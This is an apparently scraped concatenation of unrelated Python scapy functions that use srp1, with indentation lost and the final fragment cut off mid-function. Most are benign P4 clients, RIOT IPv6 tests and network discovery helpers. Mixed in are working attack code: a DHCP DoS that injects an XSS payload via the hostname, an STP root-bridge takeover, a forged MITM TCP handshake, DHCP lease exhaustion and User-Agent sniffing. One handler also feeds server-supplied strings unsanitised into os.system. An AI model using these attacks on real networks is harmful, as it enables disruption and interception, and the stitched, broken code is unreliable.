def main():
s = ''
iface = 'eth0'
print("Updating log table")
for i in range(1, 100):
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway(
type='U', k=i, v=round(math.log(i, 2) * 100))
pkt = pkt / ' '
# pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
print("Finish updating log table")
while True:
s = int(str(raw_input('> ')))
if s == "quit":
break
print s
try:
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway(k=s)
pkt = pkt / ' '
# pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
if resp:
p4kway = resp[P4kway]
if p4kway:
print('key={}, value={}, from_cache={}'.format(
p4kway.k, p4kway.v, p4kway.cache))
else:
print "cannot find P4aggregate header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print 'error --> ' + error.message
def main():
p = make_seq(num_parser, make_seq(op_parser, num_parser))
s = ''
iface = 'h1-eth0'
while True:
s = str(raw_input('> '))
if s == "quit":
break
print s
try:
i, ts = p(s, 0, [])
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(
op=ts[1].value,
operand_a=datetime.datetime.now().time().microsecond,
operand_b=int(ts[2].value))
pkt = pkt / ' '
# pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
if resp:
p4calc = resp[P4calc]
if p4calc:
print p4calc.result
#print(type(tob))
else:
print "cannot find P4calc header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print error
def test_task08(riot_ctrl, log_nodes):
node = riot_ctrl(0, APP, Shell, port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = next(iter(node_netifs))
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) /
IPv6(src="beef::1", dst="affe::1", hlim=1) / UDP(dport=48879),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6TimeExceeded in pkt
assert pkt[ICMPv6TimeExceeded].code == 0
assert pkt[IPv6].src == node_lladdr
def test_task07(riot_ctrl, log_nodes):
node = riot_ctrl(0,
APP,
Shell,
cflags="-DCONFIG_GNRC_IPV6_NIB_SLAAC=1 "
"-DCONFIG_GNRC_IPV6_NIB_QUEUE_PKT=1",
termflags="-z [::]:17755",
modules="socket_zep netdev_tap",
port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
time.sleep(5)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = [n for n in node_netifs if node_netifs[n]["mtu"] == 1500][0]
fwd_netif = [n for n in node_netifs if node_netifs[n]["mtu"] < 1500][0]
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(fwd_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) / IPv6(src="beef::1", dst="affe::1") /
UDP(dport=48879) / ("x" * 1452),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6PacketTooBig in pkt
assert pkt[ICMPv6PacketTooBig].code == 0
assert node_netifs[fwd_netif]["mtu"] == pkt[ICMPv6PacketTooBig].mtu == 1280
assert pkt[IPv6].src == node_lladdr
def main():
s = ''
iface = 'eth0'
while s not in ['LFU', 'LRU']:
s = str(raw_input('Type LFU or LRU> '))
if s == 'LFU':
t = 'F'
elif s == 'LRU':
t = 'R'
while True:
s = int(str(raw_input('> ')))
if s == "quit":
break
print s
try:
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4kway(type=t,
k=s)
pkt = pkt / ' '
# pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
if resp:
p4kway = resp[P4kway]
if p4kway:
print('key={}, value={}, from_cache={}'.format(
p4kway.k, p4kway.v, p4kway.cache))
else:
print "cannot find P4aggregate header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print 'error --> ' + error.message
def traceroute_discovery(self):
external_ip = requests.get("http://canhazip.com").text # getting external ip, to determine if cloud cluster
cloud = HostDiscoveryHelpers.get_cloud(external_ip)
from scapy.all import ICMP, IP, Ether, srp1
node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src
return [ [node_internal_ip,"24"], ], external_ip
def main():
p = make_seq(num_parser, make_seq(op_parser,num_parser))
s = ''
iface = 'eth0'
while True:
s = str(input('> '))
if s == "quit":
break
print(s)
try:
i,ts = p(s,0,[])
print(f'ts is: {[t.value for t in ts]}')
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(ts[2].value))
pkt = pkt/' '
pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
resp.show()
if resp:
p4calc=resp[P4calc]
if p4calc:
print((p4calc.result))
else:
print("cannot find P4calc header in the packet")
else:
print("Didn't receive response")
except Exception as error:
print(error)
def doDhcp(mac):
chmac = macToChaddr(mac)
L2 = Ether(dst="ff:ff:ff:ff:ff:ff", src=mac)
L3 = IP(src="0.0.0.0", dst="255.255.255.255")
L4 = UDP(sport=68, dport=67)
L5 = BOOTP(chaddr=chmac)
L6 = DHCP(options=[("message-type","discover"),"end"])
resp = srp1(L2/L3/L4/L5/L6, filter="udp and port 68", timeout=5)
try:
srcIP = resp.yiaddr
except AttributeError:
print "Failed to acquire IP via DHCP for " + mac
sys.exit(1)
for x in resp.lastlayer().options:
if(x == 'end'):
break
op,val = x
if(op == "subnet_mask"):
subnet_mask = val
elif(op == 'server_id'):
server_id = val
L5 = BOOTP(chaddr=chmac, yiaddr=srcIP)
L6 = DHCP(options=[("message-type","request"), ("server_id",server_id), ("subnet_mask",subnet_mask), ("requested_addr",srcIP), "end"])
sendp(L2/L3/L4/L5/L6)
return srcIP
def test_hop_by_hop_opt_discard_unknown_5(child, iface, hw_dst, ll_dst,
ll_src):
# Register to hop-by-hop-option header
register_protnum(child, EXT_HDR_NH[UDP])
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrHopByHop(options=HBHOptUnknown(
otype=TEST_OPTION_TYPES["ACTION_DISCARD_ERROR"],
optlen=4,
optdata="\x11\x22\x33\x44")) / UDP() / "\x01\x02",
iface=iface,
verbose=0,
timeout=RECV_TIMEOUT)
assert p is not None
assert ICMPv6ParamProblem in p
# unrecognized IPv6 option encountered
assert p[ICMPv6ParamProblem].code == 2
# first after IPv6 header + extension header => 40 + 2 = 42
assert p[ICMPv6ParamProblem].ptr == 42
res = child.expect(
# the packet should be not received at all
[r"PKTDUMP: data received:", TIMEOUT],
timeout=RECV_TIMEOUT)
assert res > 0
pktbuf_empty(child)
unregister(child)
def test_task09(riot_ctrl, log_nodes):
node = riot_ctrl(0, APP, Shell, port=TAP)
host_netif = bridge(TAP)
host_lladdr = get_link_local(host_netif)
node_netifs = NETIF_PARSER.parse(node.ifconfig_list())
node_netif = next(iter(node_netifs))
node_hwaddr = node_netifs[node_netif]["hwaddr"]
node_lladdr = [
addr["addr"] for addr in node_netifs[node_netif]["ipv6_addrs"]
if addr["scope"] == "link"
][0]
ip_addr_add(host_netif, "beef::1/64")
ip_route_add(host_netif, "affe::/64", node_lladdr)
node.nib_route_add(node_netif, "beef::/64", host_lladdr)
node.nib_route_add(node_netif, "affe::/64", "fe80::ab25:f123")
pkt = srp1(Ether(dst=node_hwaddr) /
IPv6(src="beef::1", dst="affe::1", plen=20) / UDP(dport=48879),
iface=host_netif,
timeout=5,
verbose=log_nodes)
assert ICMPv6ParamProblem in pkt
assert pkt[ICMPv6ParamProblem].code == 0
err_bytes = raw(pkt[IPerror6])
ptr = pkt[ICMPv6ParamProblem].ptr
# plen is a 2 byte field in network byte order (big endian)
ptr_val = (err_bytes[ptr] << 8) | err_bytes[ptr + 1]
assert ptr_val == 20
assert pkt[IPv6].src == node_lladdr
def main():
p = make_seq(num_parser, make_seq(op_parser, num_parser))
s = ''
while True:
s = str(raw_input('> '))
if s == "quit":
break
try:
i, ts = p(s, 0, [])
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(
op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(ts[2].value))
pkt = pkt / ' '
# pkt.show()
resp = srp1(pkt, timeout=1, verbose=False)
if resp:
p4calc = resp[P4calc]
if p4calc:
print '%s = %d' % (s, p4calc.result)
else:
print "cannot find P4calc header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print error
def main():
p = make_seq(num_parser, make_seq(op_parser,num_parser))
s = ''
iface = 'h1-eth0'
while True:
s = str(raw_input('> '))
if s == "quit":
break
print s
try:
i,ts = p(s,0,[])
pkt = Ether(dst='00:04:00:00:00:00', type=0x1234) / P4calc(op=ts[1].value,
operand_a=int(ts[0].value),
operand_b=int(ts[2].value))
#pkt.show()
resp = srp1(pkt, iface=iface, timeout=1, verbose=False)
if resp:
p4calc=resp[P4calc]
if p4calc:
print p4calc.result
else:
print "cannot find P4calc header in the packet"
else:
print "Didn't receive response"
except Exception as error:
print error
def ICMP_scan(self, ip):
try:
if "/24" in ip:
new_ip = ip.split(".")
for i in range(1, 100):
threading.Thread(
target=self.ICMP_scan,
args=(new_ip[0] + "." + new_ip[1] + "." + new_ip[2] +
"." + str(i), )).start()
time.sleep(1)
for i in range(100, 255):
threading.Thread(
target=self.ICMP_scan,
args=(new_ip[0] + "." + new_ip[1] + "." + new_ip[2] +
"." + str(i), )).start()
time.sleep(1)
else:
icmp_packet = scapy.Ether() / scapy.IP(dst=ip) / scapy.ICMP()
answered = scapy.srp1(icmp_packet,
timeout=int(self.time),
verbose=False)[0]
client_dict = {
"ip": answered[scapy.IP].src,
"mac": answered[scapy.Ether].src,
"Ver": str(answered[scapy.IP].version)
} #answered[scapy.IP].version
self.client_list_ICMP.append(client_dict)
except TypeError:
pass
def getMAC(ip):
pkt = Ether() / ARP(op=ARP.who_has, pdst=ip)
ans = srp1(pkt, verbose=False, timeout=10)
if ans[ARP] and ans[ARP].hwsrc:
return ans[ARP].hwsrc
else:
return None
def ARPRequest(ipaddr, timeout=0.1):
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
arp = ARP(pdst=ipaddr)
ans = srp1(ether / arp, timeout=timeout, verbose=False)
if not ans:
return None
return ans.src
def icmp_test(dst_mac, ip, iface):
'''发送ICMP报文验证是否可达'''
packet = Ether(dst=dst_mac) / IP(dst=ip) / ICMP()
response = srp1(packet, timeout=2, iface=iface)
if response.haslayer(IP):
if response[IP].src == ip:
return True
return False
def traceroute_discovery(self):
external_ip = requests.get("http://canhazip.com", timeout=5).text # getting external ip, to determine if cloud cluster
cloud = HostDiscoveryHelpers.get_cloud(external_ip)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # disables scapy's warnings
from scapy.all import ICMP, IP, Ether, srp1
node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src
return [ [node_internal_ip,"24"], ], external_ip
def _mitm_tcp_handshake(self, syn):
"""make fake tcp handshake, client would believe it is handshaking with http server,
but it is the attacker who responses"""
l2_l3 = Ether(src=self.attacker_mac, dst=self.client_mac) / IP(
src=self.http_ip, dst=self.client_ip)
syn_ack = TCP(
dport=syn[TCP].sport,
sport=syn[TCP].dport,
flags="SA",
seq=self.seq,
ack=syn.seq + 1,
)
r = srp1(l2_l3 / syn_ack, verbose=False)
counter = 0
while r.ack != self.seq + 1 and counter < 5:
counter += 1
r = srp1(l2_l3 / syn_ack, timeout=1, verbose=False)
def traceroute_discovery(self):
config = get_config()
node_internal_ip = srp1(
Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(),
verbose=0,
timeout=config.network_timeout,
)[IP].src
return [[node_internal_ip, "24"]]
def traceroute_discovery(self):
external_ip = requests.get("http://canhazip.com").text # getting external ip, to determine if cloud cluster
cloud = self.get_cloud(external_ip)
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # disables scapy's warnings
from scapy.all import ICMP, IP, Ether, srp1
node_internal_ip = srp1(Ether() / IP(dst="google.com" , ttl=1) / ICMP(), verbose=0)[IP].src
for ip in self.generate_subnet(ip=node_internal_ip, sn="24"):
self.publish_event(NewHostEvent(host=ip, cloud=external_ip))
def test_time_exc(child, iface, hw_dst, ll_dst, ll_src):
dummy = "affe::1"
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, hlim=1, src=ll_src) /
IPv6ExtHdrRouting(type=3, segleft=1, addresses=[dummy]),
iface=iface, timeout=1, verbose=0)
assert(p is not None)
assert(ICMPv6TimeExceeded in p)
assert(p[ICMPv6TimeExceeded].code == 0)
pktbuf_empty(child)
def arp_request(target_ip: str):
mac = srp1(
# dst="ff:ff:ff:ff:ff:ff" broadcasts the request to the whole network
Ether(dst="ff:ff:ff:ff:ff:ff") /
ARP(pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff"),
timeout=.5,
verbose=0,
)
return mac # None if unresolved
def test_wrong_type(child, iface, hw_dst, ll_dst, ll_src):
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrRouting(type=255, segleft=1, addresses=["abcd::1"]),
iface=iface, timeout=1, verbose=0)
assert(p is not None)
assert(ICMPv6ParamProblem in p)
assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered
assert(p[ICMPv6ParamProblem].ptr == 42) # routing header type field
pktbuf_empty(child)
def get_dhcp_offer(interface_name):
conf.checkIPaddr=False
# Select correct interface.
interface = interface_name
localmac = get_if_hwaddr(interface)
# Create DHCP DISCOVER packet
dhcp_discover = Ether(src=localmac, dst='ff:ff:ff:ff:ff:ff')/IP(src='0.0.0.0', dst='255.255.255.255')/UDP(dport=67, sport=68)/BOOTP(chaddr="8c859039f517",xid=RandInt())/DHCP(options=[('message-type', 'discover'), 'end'])
# Send DISCOVER packet and wait for OFFER packet.
dhcp_offer = srp1(dhcp_discover,iface=interface, verbose=False)
return dhcp_offer
def test_multicast_addr(child, iface, hw_dst, ll_dst, ll_src):
# Send routing header with multicast address in its destinations
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrRouting(type=3, segleft=1, addresses=["ff02::1"]),
iface=iface, timeout=1, verbose=0)
assert(p is not None)
assert(ICMPv6ParamProblem in p)
assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered
assert(p[ICMPv6ParamProblem].ptr == 48) # first address in routing header
pktbuf_empty(child)
def _get_mac_by_ip(self, target_ip):
"""get mac address of an IP by arp query """
ether = Ether(src=self.attacker_mac, dst="ff:ff:ff:ff:ff:ff"
) # ff:ff:ff:ff:ff:ff is the addr for broadcast
arp_packet = ARP(op=1,
hwsrc=self.attacker_mac,
psrc=self.attacker_ip,
pdst=target_ip)
arp_response = srp1(ether / arp_packet, verbose=False)
return arp_response.src
def traceroute_discovery(self):
# getting external ip, to determine if cloud cluster
external_ip = requests.get("https://canhazip.com",
timeout=config.network_timeout).text
from scapy.all import ICMP, IP, Ether, srp1
node_internal_ip = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(),
verbose=0,
timeout=config.network_timeout)[IP].src
return [[node_internal_ip, "24"]], external_ip
def dnsv6_request(nameserver, domain_name, iface):
transaction_id = 0x3d3d
payload = Ether(dst="cc:d5:39:dc:01:c1")
payload /= IPv6(dst=nameserver)
payload /= UDP(sport=47516, dport=53)
payload /= DNS(id=transaction_id,
rd=1,
qd=DNSQR(qname=domain_name, qtype='AAAA'))
return srp1(payload, verbose=True, iface=iface)
def test_it(self):
self.taploop.start()
time.sleep(0.25)
iface = self.taploop.get_iface()
ans = srp1(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(psrc=self.lhost, pdst=self.rhost), filter="arp and arp[7] = 2", iface=iface, timeout=0.5)
arpp = ans.getlayer(ARP)
self.assertEquals(arpp.psrc, self.rhost)
self.assertEquals(arpp.pdst, self.lhost)
def test_empty_duplicate_hop_by_hop_opt(child, iface, hw_dst, ll_dst, ll_src):
# Try sending two empty hop-by-hop-option header
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrHopByHop() / IPv6ExtHdrHopByHop() / UDP() / "\x03\x04",
iface=iface, timeout=1, verbose=0)
# should return parameter problem message
assert(p is not None)
assert(ICMPv6ParamProblem in p)
assert(p[ICMPv6ParamProblem].code == 1) # unrecognized next header
assert(p[ICMPv6ParamProblem].ptr >= 40) # after IPv6 header
pktbuf_empty(child)
def arp_scan(target):
for ipFix in range(2, 255):
ip = "192.168.11." + str(ipFix)
arpPkt = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(
pdst=ip, hwdst="ff:ff:ff:ff:ff:ff")
res = srp1(arpPkt, timeout=1, verbose=0)
if res:
for device in target.devices:
if res.hwsrc == device.mac_addr:
device.ip_addr = res.psrc
target.update(device, online=True)
def test_time_exc(child, iface, hw_dst, ll_dst, ll_src):
dummy = "affe::1"
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, hlim=1, src=ll_src) /
IPv6ExtHdrRouting(type=3, segleft=1, addresses=[dummy]),
iface=iface,
timeout=1,
verbose=0)
assert (p is not None)
assert (ICMPv6TimeExceeded in p)
assert (p[ICMPv6TimeExceeded].code == 0)
pktbuf_empty(child)
def gen_external_frames(interface: str, ip: str, ports: Union[list, tuple],
gateway: str) -> List[Ether]:
""" Generates external frames. Throws ARPError if gateway is down """
arp_resp = srp1(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=gateway),
timeout=5,
iface=interface,
verbose=0)
if not arp_resp:
raise ARPError(
f"Unable to find MAC for gateway IP {gateway}. Is it up?")
return [Ether(dst=arp_resp[ARP].hwsrc) / IP(dst=ip)]
def test_seg_left_gt_len_addresses(child, iface, hw_dst, ll_dst, ll_src):
# send routing header with no (0) addresses but segleft set to a value
# larger than 0
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrRouting(type=3, segleft=18, addresses=[]),
iface=iface, timeout=1, verbose=0)
assert(p is not None)
assert(ICMPv6ParamProblem in p)
assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered
assert(p[ICMPv6ParamProblem].ptr == 43) # segleft field
pktbuf_empty(child)
def run(self):
count = 0
while True:
count += 1
if (self.max_count > 0) and (count > self.max_count):
break
disco_pkt = dhcp_discover_pkt(self.mac, self.hostname)
disco_reply = srp1(disco_pkt, iface=self.iface, verbose=False)
request_pkt = dhcp_request_pkt(disco_reply, self.hostname)
request_reply = srp1(request_pkt, iface=self.iface, verbose=False)
if is_dhcp_ack(request_reply):
my_ip = request_reply[BOOTP].yiaddr
if my_ip not in self.obtained_ips:
self.obtained_ips.append(my_ip)
print('got new IP for client %s: %s' % (self.mac, my_ip))
release_pkt = dhcp_release_pkt(request_reply, self.hostname)
if self.timeout > 0:
time.sleep(self.timeout)
sendp(release_pkt, iface=self.iface, verbose=False)
print('client %s obtained IPs: %s' % (self.hostname,
' '.join(self.obtained_ips)))
def test_wrong_type(child, iface, hw_dst, ll_dst, ll_src):
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrRouting(type=255, segleft=1, addresses=["abcd::1"]),
iface=iface,
timeout=1,
verbose=0)
assert (p is not None)
assert (ICMPv6ParamProblem in p)
assert (p[ICMPv6ParamProblem].code == 0
) # erroneous header field encountered
assert (p[ICMPv6ParamProblem].ptr == 42) # routing header type field
pktbuf_empty(child)
def get_kube_dns_ip_mac(self):
kubedns_svc_ip = self.extract_nameserver_ip()
# getting actual pod ip of kube-dns service, by comparing the src mac of a dns response and arp scanning.
dns_info_res = srp1(Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1,qd=DNSQR()), verbose=0)
kubedns_pod_mac = dns_info_res.src
self_ip = dns_info_res[IP].dst
arp_responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst="{}/24".format(self_ip)), timeout=3, verbose=0)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:
return response[ARP].psrc, response.src
def run(self):
count = 0
while True:
count += 1
if (self.max_count > 0) and (count > self.max_count):
break
disco_pkt = dhcp_discover_pkt(self.mac, self.hostname)
disco_reply = srp1(disco_pkt, iface=self.iface, verbose=False)
request_pkt = dhcp_request_pkt(disco_reply, self.hostname)
request_reply = srp1(request_pkt, iface=self.iface, verbose=False)
if is_dhcp_ack(request_reply):
my_ip = request_reply[BOOTP].yiaddr
if my_ip not in self.obtained_ips:
self.obtained_ips.append(my_ip)
print('got new IP for client %s: %s' % (self.mac, my_ip))
release_pkt = dhcp_release_pkt(request_reply, self.hostname)
if self.timeout > 0:
time.sleep(self.timeout)
sendp(release_pkt, iface=self.iface, verbose=False)
print('client %s obtained IPs: %s' %
(self.hostname, ' '.join(self.obtained_ips)))
def is_DHCP(pkt):
global src_mac
global xi
global follow
global inter
if DHCP in pkt:
if pkt[BOOTP].op == 2:
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255", id=0x00, tos=0x10)
udp = UDP(sport=68, dport=67)
res = src_mac.split(":")
ch = ""
for i in res:
ch = ch + chr(int(i, 16))
host = xss
bootps = BOOTP(xid=int(xi, 16), ciaddr='0.0.0.0', chaddr=ch)
ipServer = pkt[IP].src
ipCliente = pkt[BOOTP].yiaddr
dhcps = DHCP(
options=[("message-type", "request"), (
"server_id", ipServer), ("requested_addr",
ipCliente), ("hostname", host),
("param_req_list",
chr(scapy.all.DHCPRevOptions["subnet_mask"][0]),
chr(scapy.all.DHCPRevOptions["router"][0]),
chr(scapy.all.DHCPRevOptions["name_server"][0]),
chr(15)), "end"])
packet = ethernet / ip / udp / bootps / dhcps
pkt = srp1(packet, iface=inter, verbose=1)
if DHCP in pkt:
print pkt.summary()
for x in pkt[DHCP].options:
if x[0] == "router":
gateway = x[1]
elif x[0] == "subnet_mask":
netmask = x[1]
elif x[0] == "name_server":
servername = x[1]
elif x[0] == "message-type":
messageType = x[1]
if messageType == 5:
os.system("ifconfig " + inter + " " + ipCliente +
" netmask " + netmask)
os.system("cp /etc/resolv.conf /etc/resolv.conf.old")
os.system("echo nameserver " + servername +
" > /etc/resolv.conf")
os.system("ip route add default via " + gateway + " dev " +
inter)
follow = True
def arp_broadcast(srcmac, psrc, pdst, iface, timeout):
ether_layer = Ether(src=srcmac, dst='ff:ff:ff:ff:ff:ff')
arp_layer = ARP(op=1, hwsrc=srcmac, psrc=psrc, pdst=pdst)
request = ether_layer / arp_layer
f = (
'ether dst %s and ' % srcmac +
'arp and ' +
'arp[6:2] = 0x0002 and ' + # op: is-at(2)
'arp[14:4] = 0x%x and ' % IPAddress(pdst) + # psrc
'arp[24:4] = 0x%x' % IPAddress(psrc)) # pdst
conf.iface = iface
reply = srp1(request, iface=iface, filter=f, timeout=timeout, verbose=0)
return reply
def test_multiple_addrs_of_mine_uncomp(child, iface, hw_dst, ll_dst, ll_src):
dummy = "affe::1"
# add dummy IPv6 address
dst_iface = get_first_interface(child)
add_ipv6_address(child, dst_iface, dummy)
p = srp1(Ether(dst=hw_dst) / IPv6(dst=ll_dst, src=ll_src) /
IPv6ExtHdrRouting(type=3, segleft=3, addresses=[ll_dst, ll_src,
dummy]),
iface=iface, timeout=1, verbose=0)
assert(p is not None)
assert(ICMPv6ParamProblem in p)
assert(p[ICMPv6ParamProblem].code == 0) # erroneous header field encountered
assert(p[ICMPv6ParamProblem].ptr == 40+8+(2 * 16)) # dummy in routing header
pktbuf_empty(child)
del_ipv6_address(child, dst_iface, dummy)
def is_DHCP(pkt):
global src_mac
global xi
global follow
global inter
if DHCP in pkt:
if pkt[BOOTP].op == 2:
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=src_mac, type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255",id=0x00,tos=0x10)
udp = UDP(sport=68, dport=67)
res = src_mac.split(":")
ch=""
for i in res:
ch=ch + chr(int(i,16))
host = xss
bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch)
ipServer = pkt[IP].src
ipCliente = pkt[BOOTP].yiaddr
dhcps = DHCP(options=[("message-type", "request"),("server_id",ipServer),("requested_addr", ipCliente),
("hostname",host),
("param_req_list", chr(scapy.all.DHCPRevOptions["subnet_mask"][0]),
chr(scapy.all.DHCPRevOptions["router"][0]),
chr(scapy.all.DHCPRevOptions["name_server"][0]),
chr(15)), "end"])
packet = ethernet / ip / udp / bootps / dhcps
pkt=srp1(packet, iface=inter, verbose=1)
if DHCP in pkt:
print pkt.summary()
for x in pkt[DHCP].options:
if x[0] == "router":
gateway = x[1]
elif x[0] == "subnet_mask":
netmask = x[1]
elif x[0] == "name_server":
servername = x[1]
elif x[0] == "message-type":
messageType = x[1]
if messageType == 5:
os.system("ifconfig "+inter+" "+ipCliente+" netmask "+netmask)
os.system("cp /etc/resolv.conf /etc/resolv.conf.old")
os.system("echo nameserver "+servername+" > /etc/resolv.conf")
os.system("ip route add default via "+gateway+" dev "+inter)
follow=True
def run(interface,xs):
"""
This function launch DHCP DISCOVER DOS attack
:param inter: interface to be launched the attack
:type inter: str
"""
global src_mac
global xi
global follow
global inter
follow=False
#if len(interface) > 0:
inter = interface
if xs == "":
xss="<script>alert('hola')</script>"
else:
xss=xs
try:
src_mac= get_if_hwaddr(inter)
print str(src_mac)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
while not follow:
xi = RandString(8, "1234567890abcdef")
xi = "0x"+str(xi)
res = src_mac.split(":")
ch=""
for i in res:
ch=ch + chr(int(i,16))
bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch)
host = "<script>alert('hola')</script>"
dhcps = DHCP(options=[("message-type", "discover"),("hostname",host), "end"])
packet = ethernet / ip / udp / bootps / dhcps
conf.checkIPaddr = False
pkt=srp1(packet, iface=inter, verbose=1)
if BOOTP in pkt:
is_DHCP(pkt)
#sniff(prn=is_DHCP, filter="udp and (port 67 or 68)", iface=inter
except KeyboardInterrupt:
pass
def discoverMACOf(addr): r=srp1(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=addr), timeout=2) if r!=None: return str(r[Ether].src) else: return ""
def run(interface):
"""
This function launch STP ROOT ROLE ATTACK
:param interface: interface to be launched the attack
:type interface: str
"""
# sniff to found a stp packet
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
# Look for a STP packet to use a lower priority
pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x}
item=pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
#myMAC = get_if_hwaddr(interface)
#root_id = STP_packet.rootid - 1
#bridge_id = STP_packet.bridgeid - 1
rootMAC = STP_packet.rootmac
bridgeMAC =STP_packet.bridgemac
aux=False
newMAC=''
rootMAC=rootMAC[::-1]
for x in range(len(rootMAC)):
if (rootMAC[x] in '123456789abcdef') and not aux:
n=int(rootMAC[x], 16)
n-=1
n=format(n, 'x')
newMAC+=n
aux=True
else:
newMAC+=rootMAC[x]
rootMAC=newMAC[::-1]
newMAC=''
aux=False
bridgeMAC=bridgeMAC[::-1]
for x in range(len(bridgeMAC)):
if (bridgeMAC[x] in '123456789abcdef') and not aux:
n=int(bridgeMAC[x], 16)
n-=1
n=format(n, 'x')
newMAC+=n
aux=True
else:
newMAC+=bridgeMAC[x]
bridgeMAC=newMAC[::-1]
#brigdemac
root_id = STP_packet.rootid
bridge_id = STP_packet.bridgeid
p_ether = Dot3(dst="01:80:c2:00:00:00", src=bridgeMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=rootMAC, bridgemac=bridgeMAC,
rootid=root_id, bridgeid=bridge_id)
pkt = p_ether/p_llc/p_stp # STP packet structure
try:
while 1:
pkt_sniff=srp1(pkt, iface=interface, verbose=0, timeout=2)
if pkt_sniff is not None:
if STP in pkt_sniff:
if pkt_sniff[Dot3].src!=rootMAC:
p_stp_ack=STP(bpdutype=0x00, bpduflags=0x81, portid=0x8002, rootmac=rootMAC, bridgemac=bridgeMAC,
rootid=root_id, bridgeid=bridge_id)
pkt_ack= p_ether/p_llc/p_stp_ack
sendp(pkt_ack, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def arping(mac, ip, timeout):
"""Arping function takes IP Address or Network, returns nested mac/ip list"""
for i in range(timeout/2):
ans = srp1(Ether(dst=mac)/ARP(pdst=ip), timeout=2, verbose=0)
if ans: break
return ans
self.user_agents = {}
def listen(self, pkt):
if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
if pkt[IP].src == target and "User-Agent:" in pkt[Raw].load:
pkt[Raw].load = pkt[Raw].load[pkt[Raw].load.find("User-Agent:"):]
if pkt[IP].src not in self.user_agents.keys():
